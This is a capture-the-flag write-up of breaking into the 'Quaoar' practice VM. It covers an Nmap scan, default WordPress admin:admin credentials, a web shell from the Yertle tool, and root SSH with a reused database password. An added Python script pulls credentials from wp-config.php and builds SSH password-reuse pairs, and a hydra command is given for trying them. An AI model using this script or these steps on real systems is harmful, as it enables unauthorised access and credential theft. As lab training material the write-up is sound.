Hackin n Crackin – “Quaoar”

So since I’ve got a little time off from work, I figured it would be a good time to do a CTF/Boot2Root. This one, “Quaoar”, is the 1st in a series by Viper called “Hackfest2016”. I’ll probably dig through the other two later this week.

First things first let’s get this thing fired up. I downloaded the .ova and opened it in VMware.

[screenshot: boot screen]

It appears to have a static IP, so that at least saves me the hassle of having to scan around to find it. I did a quick ping to make sure it was alive, and after a good response I kicked off a quick Nmap scan to see what I’m working with.

[screenshot: Nmap scan results]

Looks like I’ve got an OpenSSH server, DNS, an Apache server, a mail server on a few different ports, Samba, and it’s probably running Linux. Great! Plenty of info to get me going.

Whenever I see web servers I always like to start there. So I hop on over through my browser and am greeted with the following images:

Really nothing of note here, although I enjoyed the joke ;). A quick look at the HTML doesn’t reveal anything I care about either.

[screenshot: page HTML source]

So next I’ll always check out the robots.txt file and see if there’s anything interesting…

[screenshot: robots.txt]

Nice! I can see it’s probably running WordPress. After a bit of browsing I land on /wp-login/ where I’m prompted with a login screen. I spray it with the usual horribly insecure username/password combos and get a bite with “admin:admin”. We’re in!

I’ve got admin access to the website now, but I want more than that. Typically here I’d use msfvenom to create a reverse TCP PHP payload and upload that as a plugin. But I’m a lazy hacker, and I found an awesome tool recently that does all the work for me! A guy by the name of “n00py” has an awesome toolset out on GitHub called “WPForce”; part of that toolset is a Python script called “Yertle” that makes the process of getting a shell a whole lot faster. I grabbed his script, loaded it up, and in seconds had my shell to the box.

[screenshot: Yertle shell]

I always tell people “one is none and two is one”, so now I’ve got my second way to get at this machine. Once I drop into the shell I look around and take stock of who I am and where I’m at.

[screenshot: looking around from the shell]

Looking through what’s available to me, that WordPress directory looked interesting. So I drop in and take a look.

[screenshot: listing of the WordPress directory]

After digging around in here for a bit I started going through “wp-config.php”, and that’s where things got interesting: the file contains credentials for a MySQL database.

[screenshot: database credentials in wp-config.php]

Seeing as password security hasn’t been this box’s strong suit, I decided to open another terminal and see if these might be the root user’s credentials as well…

[screenshot: SSH login as root]

Winner winner!! Again I do some basic checks to see what’s around me and voilà, flag.txt is sitting right there. After a quick search for any more files, I was able to find the 2nd flag in /home/wpadmin.
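The wp-config.php step and the password-reuse step above, as an added example (my own script, not code from the post). It pulls the `DB_USER`/`DB_PASSWORD` defines out of wp-config.php, lists the accounts on the box that actually have a login shell, and pairs the one password it found with each of them so you have a reuse list for SSH. The wp-config.php and /etc/passwd text embedded below are constructed placeholders, not the box’s real contents, and the password value is made up.

```python
"""Harvest the MySQL credentials from wp-config.php and build the list of
accounts to try them against.

Added example, not code from the post. SAMPLE_WP_CONFIG and SAMPLE_PASSWD
are constructed placeholders, not the box's real files.
"""
import re

# Constructed: the defines that matter, in the shape WordPress writes them.
SAMPLE_WP_CONFIG = """<?php
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define("DB_PASSWORD", 'Placeh0lderPass!');

/** MySQL hostname */
define('DB_HOST', 'localhost');

define('AUTH_KEY', 'put your unique phrase here');
$table_prefix = 'wp_';
"""

# Constructed: a trimmed /etc/passwd with two accounts that can log in.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
wpadmin:x:1001:1001::/home/wpadmin:/bin/bash
"""

# define('NAME', 'value') with either quote style; \1 and \3 are the matching closing quotes.
DEFINE_RE = re.compile(
    r"""define\s*\(\s*(['"])(?P<name>[A-Z0-9_]+)\1\s*,\s*(['"])(?P<value>.*?)\3\s*\)"""
)
NO_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


def parse_defines(config_text):
    """Return every define('X', 'y') in the file as a dict."""
    return {m.group("name"): m.group("value") for m in DEFINE_RE.finditer(config_text)}


def db_credentials(config_text):
    """(user, password, host) from wp-config.php; host defaults to localhost."""
    d = parse_defines(config_text)
    return d.get("DB_USER"), d.get("DB_PASSWORD"), d.get("DB_HOST", "localhost")


def shell_users(passwd_text):
    """Accounts that can actually log in: seven fields and an interactive shell."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[6] not in NO_LOGIN_SHELLS:
            users.append(fields[0])
    return users


def reuse_candidates(config_text, passwd_text=""):
    """Pair the one password we found with every account it might be shared by.

    Order: the DB user itself, then root, then every real login shell on the
    box, with duplicates dropped so each pair is only tried once.
    """
    db_user, db_pass, _ = db_credentials(config_text)
    if not db_pass:
        return []
    users = []
    for u in [db_user, "root", *shell_users(passwd_text)]:
        if u and u not in users:
            users.append(u)
    return [(u, db_pass) for u in users]


if __name__ == "__main__":
    for user, password in reuse_candidates(SAMPLE_WP_CONFIG, SAMPLE_PASSWD):
        print(f"try: ssh {user}@<target>  (password {password!r})")
```

On the real box you would run this over the actual files (`cat wp-config.php` and `cat /etc/passwd` from the web shell) and then try each pair by hand with `ssh`, or hand them to hydra one at a time with `hydra -l <user> -p <password> ssh://<target>`. Checking /etc/passwd first is what turns "is this also root's password?" into a short, complete list rather than a guess.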

Post Remarks

All in all it was a fun box to break. The common theme of weak passwords definitely mirrors real-life scenarios, since there are plenty of admins out there who practice terrible password security. I’m excited to check out the next box in the series and see how Viper ups the difficulty!

Until next time….

-DarkHorseSec

